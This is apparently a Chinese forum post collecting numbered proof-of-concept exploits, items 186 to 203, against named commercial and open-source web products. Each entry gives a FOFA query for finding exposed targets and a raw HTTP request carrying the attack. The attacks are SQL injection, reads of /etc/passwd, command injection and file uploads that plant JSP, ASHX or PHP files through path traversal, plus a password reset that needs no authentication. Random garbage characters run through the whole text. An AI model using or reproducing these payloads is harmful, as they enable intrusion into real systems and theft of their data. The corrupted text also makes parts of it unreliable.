: X" s( ~* Y3 ^$ V$ v7 [' y# V l$ O: v1 a' o a% _2 U
?4 l* ?5 t' \186. F-logic DataCube3 SQL注入
3 R( G' }7 T) }, lCVE-2024-31750- W" C- Z0 v" {5 ~, J6 e( f
F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统
1 m8 i' F0 M9 V4 x9 i5 K9 ~* d7 RFOFA:title=="DataCube3"- e* n( }' N# {! N' u
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
" R. K. g# ^* ^Host: your-ip
+ N$ T1 b3 m2 t, x. T$ [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
. _: T$ ^% x6 d+ V8 v4 a0 GAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
* f& ]. q8 |, G2 l" EAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" l: T" `1 ` g; y q8 |
Accept-Encoding: gzip, deflate
8 G3 o$ l/ O4 j) Z1 q* Z. LConnection: close" Y% S7 j3 v, }: G6 S: @4 |; t
Content-Type: application/x-www-form-urlencoded# }' t0 |9 O* a3 p4 @" V, w+ |
3 Z* I* l; S, U9 g+ L/ t
req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450
" b! t& q; N$ j" L. K4 H; L3 j8 c
# l) t' T2 d% v0 L* |* Q( d
, O/ ]7 x+ X2 W8 {% l5 ?+ X187. Mura CMS processAsyncObject SQL注入
! L& p* |- Q D: l2 W! t# o, SCVE-2024-32640
, R8 p$ r+ d" }" ^FOFA:"Mura CMS"
* h" h& R2 R9 fPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1$ f ]1 s$ u* K0 f1 H
Host: your-ip
' ^; _4 a7 @* H4 NContent-Type: application/x-www-form-urlencoded. l6 Y; p9 J5 ?# ~4 X; n4 @
0 v& Q$ i: N/ T0 i, i
5 s7 Y) _. ?) Q4 g$ ^( \! t$ m( G
object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1
# `' h7 L2 R) G @0 S6 m) q
+ d5 O+ m8 ~% Q) \8 y3 ^4 p2 l) H7 k0 f: v: Q. _
188. 叁体-佳会视频会议 attachment 任意文件读取
1 k" ~$ e$ O0 T6 @- o Bversion <= 3.9.7. P& a+ [1 O. } p4 w7 k
FOFA:body="/system/get_rtc_user_defined_info?site_id"+ A) d+ A+ k7 X, @0 s8 G4 q
GET /attachment?file=/etc/passwd HTTP/1.1+ q/ O; o$ _" Q6 Z! }+ \
Host: your-ip0 o& O- }& Z+ C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36% h8 K o n4 b" n6 p+ p+ Z7 d
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.75 U% s5 _. g0 L: u8 ~
Accept-Encoding: gzip, deflate; K( ] a1 r$ q1 E& G! U6 `
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
0 _; g7 k7 j' U9 k. s9 {Connection: close
2 U" g: J. W1 W: K+ Q3 P' \. u; K; H. ~- M$ d5 n0 Q B, ~/ C
( `3 U( z9 g# k0 n/ Z! M2 T# r" i189. 蓝网科技临床浏览系统 deleteStudy SQL注入
2 i" r) Z. |4 HFOFA:app="LANWON-临床浏览系统"5 A* @. s- y: f/ y! D$ q
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
* i7 d8 R7 Z* VHost: your-ip
& Y' N, R9 X2 i+ o8 d; `User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
* [8 f |# J3 g) O4 B+ {Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.71 M8 w6 b. ~3 L( l7 a+ C4 D
Accept-Encoding: gzip, deflate
0 z9 J5 b, O# C1 D; U8 M" O' MAccept-Language: zh-CN,zh;q=0.9+ j" j+ P, B9 s, m5 r: O$ L! }, `5 c
Connection: close
$ F9 G' A( D3 c9 f5 w
7 P$ c% q( }0 R6 k4 L
" Z8 n3 `; e/ L7 x0 `3 P3 E190. 短视频矩阵营销系统 poihuoqu 任意文件读取
% S% p- y) K% D/ N" s5 WFOFA:title=="短视频矩阵营销系统"$ ?2 u- L# O* ^) u
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
5 R4 L1 N$ c1 ZHost: your-ip* \% |9 Y, N+ N6 ~9 [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.363 K' K* ^ |2 P
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9& f+ j! N6 f2 _! r, H; Y Y( V
Content-Type: application/x-www-form-urlencoded4 q) u8 a! H. \
Accept-Encoding: gzip, deflate# K4 @8 ^! I; I& g+ X' F
Accept-Language: zh-CN,zh;q=0.98 D$ E s: ~5 @+ P# |- ]
4 G0 c- `- X2 O* i2 b. J& f9 C
poi=file:///etc/passwd8 x' {+ e5 E/ }& d2 a/ _5 M# Z
! G) ?: V+ e8 Z% T; b# S+ j! v) \3 Q
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入+ ~, R3 f6 m w( @4 `
FOFA:body="/CDGServer3/index.jsp"
( m: ^, |2 @( [+ LPOST /CDGServer3/js/../NavigationAjax HTTP/1.17 m/ |. N, f( V" S, m) Z- [
Host: your-ip
) q x- B- C" A) TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36! D! w8 V) z) q2 Q/ L
Content-Type: application/x-www-form-urlencoded' J& F+ _' Z. i- x" g- a1 b# b
Z: f1 c+ m4 o( Pcommand=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=0 V+ h1 z1 [4 z6 Q- d
1 [' f0 Z7 u( o5 X4 h
- V9 }* ]) a7 B, c W( u) J192. 富通天下外贸ERP UploadEmailAttr 任意文件上传# o: T8 I K0 v/ z; k# j
FOFA:title="用户登录_富通天下外贸ERP"
& H2 d" b! t( ?' l1 [6 P) WPOST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
% O8 u9 r& I' m [8 W. \Host: your-ip$ B$ R, ?) N* l, y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.360 A) N2 ^. j1 T5 ^6 Q
Content-Type: application/x-www-form-urlencoded
! p; O* x4 @& f$ N( q3 ]% S; a( W. E2 r' d7 o q1 S
5 ]. Q. }7 V! i0 Y n; f0 r; d/ N
<% @ webhandler language="C#" class="AverageHandler" %>
# O! j; V$ i/ n5 ]9 p5 c6 a3 Zusing System;: g1 B& N. q, `& w2 r
using System.Web;8 b; ~. Q" l- q; R* U* _( Z/ z' f
public class AverageHandler : IHttpHandler
! H7 j. @" h( j" z) R{
5 l* _/ A9 [1 k/ Dpublic bool IsReusable1 V$ G' Z2 |7 Q; f( D7 ?
{ get { return true; } }
6 p% I, M/ z, g# Q, x$ m( ypublic void ProcessRequest(HttpContext ctx)0 d' D: Y* S6 n$ T5 |+ Q- V) F c
{1 L) `0 `9 r" A) p- P" ^
ctx.Response.Write("test");
2 u. `8 R+ I- ]9 j. R1 d2 B4 u e8 q}
( ^! g# e: F: h$ `$ L0 S2 H}/ Y+ m: ^ r0 f9 _0 n) f: e4 U" s# v( w
9 b! T: P" O. K; Q, S# y) S
T; ^' v+ p3 s) X+ ]193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
5 H% I5 X" [# M* b2 B- yFOFA:body="山石云鉴主机安全管理系统"$ t# y+ Q3 M% E) T) V4 [5 G" S
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
0 T9 @( a" D D0 @7 v* aHost:$ J% i% h& R( E% a
Cookie: PHPSESSID=2333333333333;* i0 p, K% S4 M
Content-Type: application/x-www-form-urlencoded
7 T; N9 J. o4 h: _/ ` \User-Agent: Mozilla/5.0' L3 O7 z- Z0 B
6 n7 e) D% B# S( Q) u1 r6 Q5 ]* |
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.19 H. M, e) Q9 z$ }, [* r
Host:
/ Y- d7 z {/ _3 Z. ~) K" AUser-Agent: Mozilla/5.0
& N' B* A/ ^% p- D/ TAccept-Encoding: gzip, deflate8 z, j) C+ k1 J1 ^
Accept: */*
4 t( ?. t: [! g1 \Connection: close, f& b3 x- C/ i4 v& k* Y& e5 M
Cookie: PHPSESSID=2333333333333;# \0 \2 R' X. L) L% S
Content-Type: application/x-www-form-urlencoded2 y2 J; J* i3 c: x
Content-Length: 847 W2 l5 z q5 |( E0 g
. I u6 s; T# oparam=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config'); |6 u X0 X" Z+ b; m" P; i
2 p; o+ r+ [- s0 [
% Z: c. H [. Y5 G4 G
GET /master/img/config HTTP/1.1
0 c! j+ k$ t! K; ?7 fHost:
' M: `* F. I, K) O# S" e- H8 _User-Agent: Mozilla/5.0# N2 G' d9 B2 J2 W# {* i( h) D
5 m: Z: B# k) g; m5 @1 t4 z
/ b3 G9 ?) h R i$ a1 h
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
- N. a/ ~1 i5 `( kFOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在# k- S7 A4 f5 C7 u
6 n8 w2 ~) j" R) ]+ q# }% \
POST /servlet/uploadAttachmentServlet HTTP/1.1
8 v9 {# p; I- t4 JHost: host- W7 W v3 j. n x1 r6 @3 _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
' y1 ^4 {5 E2 q( l' z, H& QAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8( b4 k) a- w$ T- x {& n
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 j) @! v4 w4 q P RAccept-Encoding: gzip, deflate6 O+ K, h7 m" I7 t% y
Connection: close& @+ p; O. c6 {! g! w" m
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk
" q( E" J4 X0 T; X9 w------WebKitFormBoundaryKNt0t4vBe8cX9rZk
, g3 l- S0 W! G$ Y9 ^9 n/ z& U, k5 s, z( g' C( ^3 h
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"* K% C& v) }" X; l( T* J$ S7 `
Content-Type: text/plain
0 ^* r% B3 z# @: g8 `<% out.println("hello");%>; I" R P% C0 A4 _! Z( W6 N5 q1 v. A
------WebKitFormBoundaryKNt0t4vBe8cX9rZk4 M: N/ Z6 U: i% ~. ^
Content-Disposition: form-data; name="json"' c3 L4 D5 c4 e6 u6 c
{"iq":{"query":{"UpdateType":"mail"}}}
# Y) a% {+ q1 y5 I, d+ p# {------WebKitFormBoundaryKNt0t4vBe8cX9rZk--. @& P1 o+ c) d% I
4 X" b8 |3 m3 T' l* x5 U
/ k( Y2 A \/ G& G- w+ R% N3 J4 N
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行: j3 X5 Y4 E& [' [
FOFA:title=="飞鱼星企业级智能上网行为管理系统
% v8 I& O" C; D5 J' dPOST /send_order.cgi?parameter=operation HTTP/1.1
% g; b1 F$ h# m3 N4 g! eHost: 127.0.0.1
0 P8 [- W9 N& c7 _Pragma: no-cache$ `" d2 k& [* B/ I& ^7 m: r
Cache-Control: no-cache7 L; W3 g" a# S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36! R/ F" ]7 Z$ b& G/ R
Accept: */*2 a- F- V4 i4 F0 G# p0 ^$ y4 k0 T
Accept-Encoding: gzip, deflate$ r7 t: s/ U! b& X0 ^8 P1 @8 k1 @
Accept-Language: zh-CN,zh;q=0.91 L" d0 t1 S1 q6 I- R
Connection: close1 c4 @& }5 `3 S
Content-Type: application/x-www-form-urlencoded
% y6 {8 ]* }* x5 ZContent-Length: 68
( r" }! B5 L7 K/ v
2 h F3 ]+ b& g' N" h{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}
4 m6 b/ V% T1 v" W6 n9 X& p9 }, ^* N" _
4 r0 m( q% G- t4 D: g196. 河南省风速科技统一认证平台密码重置; _0 \5 t& l$ p$ e2 {2 t- B- b/ b
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"# g+ j; Z7 _& n2 i) p) W; ~, @/ g
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
# a( c$ M: i" L+ n4 v$ e7 F' D. pUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
. | E: r( S: PContent-Type: application/json;charset=UTF-8: z3 _5 k, U" {' Y
X-Requested-With: XMLHttpRequest) d! y) K" ?7 [5 H2 R" Y* N) k2 S, t+ x
Host:
+ N k' O& Q; v% b- d2 D wAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2& c: g& j% O- v2 ^1 o) i
Content-Length: 453 |& Q& x6 S: w ?: ~. t* j
Connection: close9 H; m, ?4 a# A' h
% x" z$ q) V% p3 I) U* g. y{"xgh":"test","newPass":"test666","email":""}( g4 v8 z }" x8 r D' Z: H
1 u$ P8 H; [) _5 s& u3 S
( C/ ?" o8 ?! A) y7 ?8 _5 D; R
]* C$ g7 ]/ k+ h6 A( j
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入2 P) r' p$ n+ o7 A Q
FOFA:app="浙大恩特客户资源管理系统"
+ b8 W1 U0 [% B5 rGET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
0 M) K7 n, c& Z8 }8 Y; S6 s% aHost:9 O( w* `/ z6 T# E1 b7 C+ h7 Z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
5 I; B! d8 {- e3 X7 ~Accept-Encoding: gzip, deflate* U" V1 m5 Q$ N5 v3 I$ D) {5 ]1 p
Connection: close
. l' U# l* ^3 \' ]) m% y0 H: u' { u6 P" ]* i Y) Q) E9 i
3 Z4 Q7 ]- X$ r
; k) z# r. M5 N2 `- z- l8 v- Z
198. 阿里云盘 WebDAV 命令注入! S; U$ z1 }# J# _- k( \, }8 u( I
CVE-2024-29640
! Y& l( y( y; NGET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1; O% m9 j) j9 z$ q. i
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
* ^1 y5 A( E9 s0 m ]+ BAccept: */*! c7 U1 Y4 m5 f R; R( A' g: `
Accept-Encoding: gzip, deflate8 v& Z* H& Q+ B' c1 [( {1 u
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6- \8 ?6 R: q9 c! R, Y
Connection: close
4 l. L/ M4 I0 }5 I! o5 f) Z' H4 V, Z
. N) d) F8 G6 i& ?9 D199. cockpit系统assetsmanager_upload接口 文件上传8 k1 A) l( j+ B- I9 c, z
2 F. x9 d& S6 I' U: M
1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:9 q! X9 H+ Y$ |8 Q7 k; Y9 J
GET /auth/login?to=/ HTTP/1.12 s- Y' r7 T8 a9 G8 b k9 N7 t
. q2 P7 e' B W+ {; v* z
响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
) I5 J# K/ y/ }8 V Z4 d) L% K
3 I/ s6 M8 u# v( l% ^/ C2.使用刚才上一步获取到的jwt获取cookie:
' f8 A0 [" m7 E" n' O1 j/ q7 u/ m' t0 o
POST /auth/check HTTP/1.1
: E: y- |) s9 Z7 c% R8 K2 c4 hContent-Type: application/json( x; \/ H. E0 y4 S7 J; D
0 {! X. ^/ N4 l* r{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}
: |! X% B8 t! z! K6 x6 d2 W4 `& g7 g( B" E( [
响应:200,返回值:
t w- H& ?' \2 o9 j* R' tSet-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/. F) X; _$ w* c9 X) ]
Fofa:title="Authenticate Please!"
" L7 \$ ~" k4 u QPOST /assetsmanager/upload HTTP/1.1* ~& G: n; }0 J
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb33 I3 J! W4 D0 k0 R9 C2 |
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92
9 D' I( k; c) H, W: u- D# N
% \4 l1 t8 F$ q-----------------------------36D28FBc36bd6feE7Fb39 `& p1 s) F2 m7 p; E; L
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
2 A- Z, S' T9 X( e% \1 E8 M6 FContent-Type: text/php
: Z' s# j" t3 z* j9 \/ y9 b6 t+ H) i" @
<?php echo "tttt";unlink(__FILE__);?>6 b$ D: n, p2 W! B+ n
-----------------------------36D28FBc36bd6feE7Fb3
3 I4 j2 K& ^1 y7 g1 z0 QContent-Disposition: form-data; name="folder"+ h% g: m6 `, a
+ c3 ~8 ^8 P7 X0 [' W
-----------------------------36D28FBc36bd6feE7Fb3--1 v" t* Y- a+ o0 r" B
7 M. Q7 N* q2 e; g2 L: J, r
y' a7 [: P8 G6 ^! @% i% C5 v2 U+ n/storage/uploads/tttt.php
^" K- F. f+ ]2 |1 _& H/ f8 a+ ?# o( j- H/ S. J. B' q% T
200. SeaCMS海洋影视管理系统dmku SQL注入; \" U i( E- p$ T5 l, G9 @/ E3 ]; T. J2 v
FOFA:app="海洋CMS"0 l! W$ r% h; }, Y/ ^. u* s
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1' F+ O3 g% F+ q. X
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s7 I. g( S" O% K1 ?
Upgrade-Insecure-Requests: 1
8 u7 C" m: J4 t8 I! x% [/ B0 [3 I& YCache-Control: max-age=08 i' V& ?: d) p. a* t; ?& ~! |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
1 D8 V5 j$ z! UAccept-Encoding: gzip, deflate
2 q; g6 \( O7 f$ fAccept-Language: zh-CN,zh;q=0.9, z4 u0 ^+ p8 @7 O) a% Q1 C7 Y5 F8 z
8 `% ~2 [0 R5 S
" a% J5 \( j. m2 U1 T
201. 方正全媒体新闻采编系统 binary SQL注入! i4 U! c( G- M& V8 L
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"6 B0 P& U, a' |3 k# H9 Z: J% e8 j: P
POST /newsedit/newsplan/task/binary.do HTTP/1.1
% x; v3 l1 F! ~, KContent-Type: application/x-www-form-urlencoded! p3 V, I: O9 Y4 x0 f1 i
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7$ ], |. G+ k3 E7 n9 e# H
Accept-Encoding: gzip, deflate
- [! R, T! ?6 ?6 d6 z* ]0 rAccept-Language: zh-CN,zh;q=0.9
9 e& C5 m6 q' |- W. H9 O. J3 O1 GConnection: close" x) P' C R9 K+ p
) X. q: E( M$ N" x5 k2 l: z& N
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
3 q3 j* m0 T1 P* V7 U
% Z# V8 {7 E9 ]4 @4 a& Y, f: [! ?6 K
202. 微擎系统 AccountEdit任意文件上传$ Z: f4 T2 o5 [( p* a. u: Q
FOFA:body="/Widgets/WidgetCollection/"
0 ]* Y. u# I0 Y获取__VIEWSTATE和__EVENTVALIDATION值+ {5 {0 k6 v( j" S: s5 _5 O4 V6 L' T
GET /User/AccountEdit.aspx HTTP/1.1
/ Z2 `8 _0 c" ?( |6 m) ^. \4 pHost: 滑板人之家
. [ D8 o: P+ m) s5 L% A! b$ @' hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31% v% a) g4 s7 j5 b
Content-Length: 0- f; q' c0 l# L
- _ L, g$ A; E: j0 g, ]
# ]5 P& a5 g% ]替换__VIEWSTATE和__EVENTVALIDATION值. B9 V# L4 d' S9 ]& j
POST /User/AccountEdit.aspx HTTP/1.1
% f7 s! a+ d6 {' B6 {: NAccept-Encoding: gzip, deflate, br6 P/ }# e; l f4 T
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687) o1 S& u5 J6 L3 m
' z! z' t1 l$ ^& P g$ u$ ~-----------------------------786435874t38587593865736587346567358735687
" G1 z* g5 I/ D/ E- IContent-Disposition: form-data; name="__VIEWSTATE"
9 {: x1 l9 E/ J) ?+ g/ M( C* A$ J
! t% S6 G* `2 z__VIEWSTATE
4 ]# W; l5 Q2 b( T- z% G# F-----------------------------786435874t38587593865736587346567358735687
9 m. O8 h' t" H( m. E, rContent-Disposition: form-data; name="__EVENTVALIDATION"
, H8 z, @( u* o0 q
! y. @6 G2 C6 W8 V2 w+ X__EVENTVALIDATION
- I, j' r6 D# m-----------------------------786435874t38587593865736587346567358735687; |) V2 W2 l1 \$ |
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
8 D u& }2 ^ {, {' oContent-Type: text/plain
3 J! F y' ^0 E* A& U2 X. x, }$ L. P7 ^& k4 X
Hello World!9 a6 g5 _( C' \8 @+ A" V4 S
-----------------------------786435874t38587593865736587346567358735687
" O4 Q' d+ q( x# Z+ }Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"
! P( u" l. s0 d+ h U3 ^- t% f2 [- y7 k j
上传图片
& f& Y% j3 {3 B2 @# y6 @. b-----------------------------786435874t38587593865736587346567358735687
9 N2 x/ p7 d& i% U' h8 a+ g6 XContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
6 n3 E k% m4 \" k1 v8 o$ e, X7 Q( F3 Y/ h& ?: x2 l8 p
9 u8 `9 D1 j I) N8 {& @-----------------------------786435874t38587593865736587346567358735687- L& ^ |1 K- Z
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"7 I1 {0 Z" V) Q) V0 V3 w
& o: S. K M) o$ }/ \6 C& F I+ {
) F _$ g. A7 z4 ~/ _-----------------------------786435874t38587593865736587346567358735687--
% U+ a+ f) A8 y4 [% u
) a) B. x" H* e9 j8 z2 L* k
3 C" a: E7 i0 {/_data/Uploads/1123.txt2 U8 r8 u7 R6 A( ~% J; a
; o, @3 P8 D3 P! @0 B203. 红海云EHR PtFjk 文件上传9 U9 }6 {& a: N7 }# N7 F
FOFA:body="RedseaPlatform"9 H/ `" Z1 L) x: c" ?& K
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1. n+ g6 k7 I: Z8 O' Y8 V. T8 `
Host: x.x.x.x, p6 L. g7 o0 S( V- [2 G$ \
Accept-Encoding: gzip
+ V0 J' {: f( ?4 {$ g, BUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
j: j; r! o" X0 ^1 r% }/ ]7 PContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
- t! d l% w8 M5 j1 d; }2 S9 Y% B- `Content-Length: 210
. `# t9 |+ S+ g7 A$ u2 S) E, b" o' z4 D. g" g- t% e3 m& E
------WebKitFormBoundaryt7WbDl1tXogoZys4; d7 `- M7 _! q$ D I
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
( {8 b% Q) n; j$ f7 W9 W' [$ X; iContent-Type:image/jpeg; K' u3 E/ t5 J; S; O
7 r, e6 r/ u6 P! _0 h<% out.print("hello,eHR");%>& c3 d2 ?: e! J! F/ [
------WebKitFormBoundaryt7WbDl1tXogoZys4--
- m5 V% b/ d* B# _2 |# e' o0 |0 Z9 o$ E, ^
9 k6 L$ `' J1 ~" b9 Q
' o' U* k2 a2 Q, q c" e* g$ s8 x* C+ V
" g5 f- l$ M, Z1 \3 B& v# x3 R1 n2 C% L- V0 Y' d% S/ s
|
发表于 2024-6-5 14:31:29
收藏
支持
反对